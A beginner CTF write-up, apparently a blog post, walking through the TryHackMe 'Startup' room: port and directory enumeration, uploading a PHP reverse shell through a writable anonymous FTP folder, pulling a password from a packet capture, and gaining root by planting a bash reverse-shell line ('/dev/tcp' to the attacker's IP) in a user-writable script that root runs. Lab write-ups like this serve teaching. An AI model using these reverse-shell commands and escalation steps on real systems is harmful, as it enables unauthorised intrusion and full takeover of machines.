Open in app

Sign in

Write

Sign in

[CTF] Tryhackme : Startup

v
8 min readDec 29, 2020

01 : Introduction

This article is dedicated to the room called “Startup” from Tryhackme platform. It is qualified as an “easy” room, calibrated for beginners. So if you start in cybersecurity and/or CTF, this room is perfect for you.

In this room, we’ll explore these topics :

  • Web exploitation
  • Networking

Let’s begin by starting machine and scanning ports !

02 : Enumeration

First step, as usual, consists of scanning ports of distant machine, to see services runnning. We use tool ‘nmap’, like this :

nmap -sC -sV <IP>

And we get the following result :

Result of nmap command

We have 3 ports open : FTP on port 21, ssh on 22 and a web server, apache, for port 80. As we can see, ftp server accepts anonyous connection, so let’s start with this service, to see what we have there. We can log in by using ftp command :

ftp <IP>

Then we just enter ‘anonymous’ as username and let blank for password and here we are ! We can enumerate the folder by using unix commands like ls.

FTP enumeration

As we can see, we have an image and a text file. We can download them on our machine with ‘get’ command, like on the image above. We also have a ftp folder, empty, but with all permissions for anyone. This could be interesting later …

Text content

Now that we have files on our computer we read the text file, and it seems that some people are using website to download content. We have a name : Maya. This could be useful further, as it can be a username on distant machine. So probably the image is a meme, as suggested in the text. We can check now the website to discover something else.

Webite homepage

Well, the homepage seems empty, no clue there. If we search in source code of this page, nothing much more. Then, we can enumerate this website by using gobuster tool, with this command:

gobuster dir -u http://<IP> -w <wordlist file> -x php,txt

gobuster enumeration

And we have a result ! We have a folder called files. Let’s check its content.

file folder content

As we can see, we have access to FTP content from website there. And the ftp folder as I mentionned before is empty :

ftp folder is empty

02 : Foothold

First thing that comes to mind is ‘reverse shell’ : we can use this technique to have an access to the machine. What we have to do is to upload a reverse shell, written in PHP because web server can surely read it, and access it from website. First we need to create our reverse shell : we can download it from this github repository. We do not forget to set the IP, our Tryhackme IP, and port. I suggest to use 1234 as it’s easy to remember and don’t require elevated privileges.

Now that we have a reverse shell ready, it’s time to upload it by FTP.

reverse shell upload

I tried to upload it on root folder, but I do not have write permission, so I tried from ftp folder and it works!

We have uploaded our reverse shell, now we can use netcat command to listen on port 1234:

nc -lvp 1234

Final step: enable the shell. We just have to call our uploaded file from website. By refreshing the page /files/ftp, we can see now that we have our file :

uploaded reverse shell

Now if you click on the file and check the terminal with netcat …

Everything works as planned ! We are in the machine now. But as we see, we are not a user with privileges. Then enumeration is the next step, to find anything interesting, to gain access to a user with higher privileges.

03 : Privileges escalation

If we use command ‘ls’ at root, we can see a text file :

Let’s see what it contains…. It seems to be the answer for the first question, to show that we get access to the machine (foothold).

If we look closely on screenshot above, there is interesting detail : we have a folder called ‘incidents’. There is usually no folder with that name there.

This folder contains a file ‘suspicious.pcapng’. Pcapng means ‘Pcap-NG Packet Capture File’. So it contains some data packets captured. We can analyse its content by using a dedicated applications like Wireshark. But first we need to recover this file from distant machine. The idea to reach this goal is to move or copy the file on ftp server. As we saw, ftp folder is in web application. Common path for webserver content on Unix is generally /var/www/html/ . We add /files/ftp to this path and we probably have the full path. Then let’s move this file with ‘mv’ command:

Command works, theory was correct! Now, we just have to recover file by using ftp, as we did at the beginning of this CTF.

Connection as annonymous, then we change folder with ‘cd ftp’ and use command ‘get’ to recover the file.

Now, we can start Wireshark, a common and popular tool used for example to analyze network traffic. When you open the file, you should get something like that :

After a quick look, the first strange packet on which I stopped was packet 34.

Someone asked the ressource ‘files/ftp/shell.php’ on the webserver… As our file was called reverse.php, shell.php was upload by someone else before us. We can deduce that someone used the same way to get access to computer. This deduction is confirmed when we analyze packets that come next. For example :

Command ‘cd lennie’ was used but user was not authorized. Then we keep looking for something more useful and ….

Before this packet, the user is asked to enter a password, as he used command ‘su www-data’. Then, we have this packet, where we have what looks like a password. Password didn’t work : it does not belong to user ‘www-data’. Then he left session. But this password might be useful : can we use it to connect as lennie ? Let’s use it on our session. We use command ‘su lennie’ to change user and we add password…

It works! Now we have access to lennie’s account. If we check his repository, we now have user flag !

04 : Privileges escalation — Root part

What comes next ? The short answer is : own root. Our goal is to own root on this machine. To achieve this, there is many many ways. But first, let’s have a look on the two folders we have : Documents and scripts. We can start by scripts.

Two items : a text file and a script. Text file is empty, but the script called planner.sh is contains some instructions : it puts the content of a variable, LIST in the text file mentionned before. At the end, it calls an other script, print.sh, located in /etc.

If we check permissions, we notice that script is owned by root.

Now, we can inspect the other script, print.sh.

There is not so much content in this file…. only one instruction, echo. But, if we check again the permissions, we have a surprise :

This file is owned by ….us ! So we can do anything we want with it.

To summarize : a script, owned by root, calls another script, owned by us. Now you see the problem ? Well, if root execute his file, he will execute our file, so our instructions….with his privileges! What we have to do is to rewrite our script to add a reverse shell (yes, again). In this way, root will execute the instruction, and give us a shell with his permissions! We can find many reverse shell there, and get the first one, written with bash. We add it to our script. Again, we do not forget to modify the line : bash -i >& /dev/tcp/<YOUR TRYHACKME IP>/<PORT> 0>&1 , in my case, I put 1235 concerning the port.

We check that line has been correctly added. Then, we use netcat as we did before to listen the port selected.

Now, all we have to do is to wait that root start his own script, it will take probably less than a minute, before this result :

Privilege escalation done, we now have a root access on this machine. Before closing this article, we recover the root flag, located as usual in root folder :

Now this room is completely over ! Hope you enjoy this room! It was not very very easy, but it’s a very fun room, espacially to discover packet analysis, which is not a common element in beginner’s rooms.

Tryhackme Walkthrough
Tryhackme
Ctf Writeup
Ctf
Hacking

--

--

v

Written by v

0 Followers

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams